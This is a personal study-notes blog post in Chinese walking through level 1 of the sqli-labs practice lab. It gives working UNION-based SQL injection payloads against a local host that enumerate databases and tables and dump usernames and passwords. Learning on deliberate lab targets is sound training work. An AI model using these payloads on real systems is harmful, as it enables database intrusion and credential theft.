sqli-labs学习笔记(1)

本文记录了如何在sqli-labs第一关中识别字符型注入,包括判断方法和具体操作步骤,如利用url编码进行数据库查找、定位users表并获取密码。作者强调这是个人学习笔记,非官方教程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

sqli-labs

记录一下自己的学习,简单的做一下笔记



前言

记录一下sqli-labs第一关的通过心得,不作为参考和学习资料,只求自己来时翻的时候能够看懂


一、sqli-labs,第一关,如何判断为字符型注入?

判断页面是否存在sql注入最好的方法就是在后面加上?id='1,因为无论你是字符型注入还是数值型注入页面都会返回错误。
在这里插入图片描述
根据页面提示可以知道页面存在sql注入,但是因为输入有误所以会报错,如果没有sql注入的页面就会直接返回404.判断为数值型的方法就是在后面加上?id=x and 1=1然后看页面是否正常运行,如果页面正常运行我们在修改一下?id=x and 1=2如果页面出现错误就说明这是数值型注入,字符型注入的判断方法在后面输入?id='1看页面返回的消息里面给1后面自动补上单引号没有,如果补上了就说明是字符型注入。
在这里插入图片描述

二、通关步骤

1.找到数据库

当我们发现一个页面存在sql注入的时候我们可以想一想我们的步骤,首先是查找数据库,然后进入数据库找到敏感信息表,最后就进入表查看相关信息。

查看数据库命令:

http://127.0.0.1/sql1/Less-1/?id=%27%20union%20select%20null,(select%20group_concat(schema_name)%20from%20information_schema.schemata),null%23

在这里插入图片描述
这里说一下代码是经过url编码的,这里我把没有经过编码的发一下后面的如果感兴趣可以自己去解码看看,后面为什么是%23实际上其实是#,达到闭合的目的,你也可以选择用单引号。

' union select null,(select group_concat(schema_name) from information_schema.schemata),null#

2.查找表

通过以上我们找到的数据库,我们选择一个数据库secunty为例进入:

%27union select null%2Cnull%2C(select group_concat(table_name) from information_schema.tables where table_schema%3D0x7365637572697479)%23

编译前:

'union select null,null,(select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479)#

需要注意的是我们后面的tab_schema=的是一个十六进制的数字,0x7365637572697479转换为字符型就是secunty这个数据库,如果大家要查其他数据库也需要进行十六进制编码才可以噢。

在这里插入图片描述
进入secunty数据库以后我们发现里面有一个users表,里面肯定有用户名和密码相关信息。

3.进入users表获得密码

%27union select null%2Cnull%2C(select group_concat(username%2C0x3a%2Cpassword) from users)%23

在这里插入图片描述
0x3a: 0x是十六进制标志,3a是十进制的58,是ascii中的 ‘:’ ,用以分割pasword和username。

4.补充

上面用的sql里面有几个地方我稍微补充一下,以防我后面自己忘了。。。
group_concat和concat以及concat_ws,
concat就是拼接各个字段的值然后把组合在一起。select concat (id, name, score) as info from student 组合后字段与字段之间没有空隙。
concat_ws:里面可以添加字符 也可以显示出来。
group_concat:达到去重的效果,并且可以把 重复字段的值放在一起。
可能group_concat不太好理解,大家感兴趣可以自己去搜一下。


总结

sql语句有很多种,不一定用我以上所说的sql语句,大家也可以自行去寻找其他的sql来进行尝试,本人所有文章只是自己个人学习笔记,不作为参考资料。

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值